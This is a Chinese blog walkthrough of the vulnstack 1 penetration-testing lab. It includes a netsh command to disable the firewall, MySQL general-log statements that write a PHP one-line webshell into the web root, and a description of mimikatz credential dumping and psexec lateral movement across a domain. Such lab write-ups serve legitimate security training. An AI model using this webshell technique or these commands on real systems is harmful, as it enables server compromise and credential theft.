vulnstack靶场1

本文描述了一次内网渗透的过程,从拓扑结构的设定开始,包括端口扫描、关闭防火墙以进行扫描,利用phpmyadmin获取shell,开启全局日志写入后门,再到内网MSF后门的部署和提权,最后涉及域控的定位和凭证管理,展示了内网渗透的基本步骤和技术手段。
摘要由CSDN通过智能技术生成

拓扑结构

kali攻击机器外网1.1.1.128
web服务器外网段1.1.1.131 内网段1.1.2.133
win2003内网1.1.2.129
域控win2008内网1.1.2.128

环境配置

这里用nat加仅主机的话无法模拟内外网环境,建议使用桥接或内外网均使用仅主机。我这里使用的就是第二种。主机的ip都是绑定的静态,需要自己改成dhcp并且把dns指向域控

端口扫描 

 

这里去访问80,是phpstudy的默认界面,测试连接root/root成功

这里靶机默认开启了防火墙,可以先关闭不然会影响扫描,其次靶机如果没有开启phpstudy需要手动开启

netsh advfirewall set currentprofile state off  关闭防火墙

可以扫描存在phpmyadmin目录

到这有几种后台getshell的方法,我选择的是全局日志。

首先开启全局日志,保存在指定目录并且设置后缀为php。

一句话木马

set global general_log='on';

设置全局日志开启

SET global general_log_file='<网站绝对路径>/shell.php'

保存日志位置

SELECT '<?php @assert($_REQUEST["admin"]);?>';

最后执行select语句写入后门

绝对路径这里主界面已经给我们提示,可以作为参考。放到www下可以访问到的地方即可

 连接上线。

这里还有一个cms系统,也可以用来getshell,但这次练习主要目的是练习后渗透所以我这就不做过多尝试。

后渗透 

制作msf后门上线msf

 

发现双网卡存在1.1.2.1/24网段

 这里由于直接使用admin账户登陆了所以弹回来时候直接是system了,我们也可以加大难度通过一个低权限账户登录,然后提权

这里经过尝试1是可以的

localdomain,在域内

定位出域控。

域渗透的基本思想就是找到管理员账号的凭据,然后横向移动。

加载minikatz模块导出凭据

得到密码sec@123 

此时我们可以做横向移动

利用msf模块 psexec

这里因为是内网不出网,所以我们使用正向shell去连接,存在一定可能性谈不回来。。。

这里后续再去提权就可以了。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值